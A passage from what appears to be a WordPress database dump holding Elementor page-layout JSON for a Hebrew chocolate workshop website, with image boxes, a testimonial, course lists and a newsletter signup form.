/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"f9b0ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"6945b5b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":31,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-woman.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"fa7a00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"afa7d0f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":28,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-company.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4a4b992\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"24\",\"bottom\":\"0\",\"left\":\"24\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"screen_sm\":\"custom\",\"screen_sm_width\":\"50\"},\"elements\":[{\"id\":\"c498248\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":30,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-kids.png\"},\"title_text\":\"\",\"description_text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"image_space\":{\"unit\":\"px\",\"size\":30},\"image_size\":{\"unit\":\"%\",\"size\":\"75\"},\"description_color\":\"#40272c\",\"description_typography_font_size\":{\"unit\":\"px\",\"size\":\"25\"},\"description_typography_font_family\":\"Damion\",\"description_typography_line_height\":{\"unit\":\"em\",\"size\":\"1\"},\"description_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"19\"},\"description_typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"20\"},\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5684ff50\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"id\":91,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/BG.jpg\"},\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#190606\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.75},\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"115\",\"bottom\":\"50\",\"left\":\"115\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"40\",\"left\":\"20\",\"isLinked\":false}},\"elements\":[{\"id\":\"74663cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"125f3fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05de\\u05d4 \\u05d4\\u05e9\\u05d1\\u05e2\\u05d9\\u05dd \\u05d4\\u05de\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05dc\\u05e0\\u05d5 \\u05d0\\u05d5\\u05de\\u05e8\\u05d9\\u05dd\",\"align\":\"center\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":53},\"typography_font_weight\":\"400\",\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"43\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"40\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6410b809\",\"elType\":\"widget\",\"settings\":{\"image\":{\"id\":32,\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/c-couple.png\"},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"0\",\"isLinked\":false},\"caption\":\"\\u05e0\\u05ea\\u05d9 \\u05d5\\u05d2\\u05d1\\u05e8\\u05d9\\u05d0\\u05dc\\u05d4 \\u05de\\u05e8\\u05d0\\u05e9\\u05d5\\u05df \\u05dc\\u05e6\\u05d9\\u05d5\\u05df\",\"text_color\":\"#cccccc\",\"caption_typography_typography\":\"custom\",\"caption_typography_font_size\":{\"unit\":\"px\",\"size\":13},\"caption_source\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c4e5757\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\\"\\u05ea\\u05de\\u05d9\\u05d3 \\u05d0\\u05d4\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d0\\u05e3 \\u05e4\\u05e2\\u05dd \\u05dc\\u05d0 \\u05d7\\u05e9\\u05d1\\u05ea\\u05d9 \\u05e9\\u05d0\\u05e0\\u05d9 \\u05d0\\u05ea\\u05e8\\u05d2\\u05e9 \\u05db\\u05dc \\u05db\\u05da \\u05de\\u05d9\\u05d5\\u05dd \\u05e9\\u05dc\\u05dd \\u05e9\\u05dc \\u05de\\u05ea\\u05d5\\u05e7. \\u05ea\\u05d5\\u05d3\\u05d4 \\u05e8\\u05d1\\u05d4 \\u05dc\\u05e6\\u05d5\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3 \\u05e9\\u05e2\\u05d6\\u05e8 \\u05dc\\u05d9 \\u05dc\\u05de\\u05e6\\u05d5\\u05d0 \\u05d0\\u05ea \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea!\\\"\",\"align\":\"center\",\"title_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":27},\"typography_font_weight\":\"400\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"17\",\"bottom\":\"0\",\"left\":\"17\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"25\"},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":\"25\"},\"_padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"typography_font_style\":\"italic\",\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c25e365\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05d2\\u05dd \\u05d0\\u05e0\\u05d9 \\u05e8\\u05d5\\u05e6\\u05d4 \\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4!\",\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":26},\"typography_font_weight\":\"normal\",\"typography_text_transform\":\"uppercase\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":\"3\"},\"button_text_color\":\"#40272c\",\"background_color\":\"#edd0a8\",\"border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"50\",\"bottom\":\"20\",\"left\":\"50\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"typography_font_size_tablet\":{\"unit\":\"px\",\"size\":\"15\"},\"hover_color\":\"#ffffff\",\"button_background_hover_color\":\"#5c0011\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"typography_font_family\":\"Open Sans Hebrew\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"43f8ef8f\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"39181ab4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"10694622\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"5212b57b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2b9dc682\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50c468d5\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"45bcecca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"37f8a4fc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"285e10d7\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"24484b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"33814887\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"48098d8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f32a997\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"\\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4?\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(651,144,'_elementor_version','0.4'),(653,145,'_wp_page_template','elementor_canvas'),(654,145,'_elementor_edit_mode','builder'),(655,145,'_elementor_template_type','post'),(656,145,'_elementor_data','[{\"id\":\"3d7689b8\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"570504a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"4fadbe7\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" 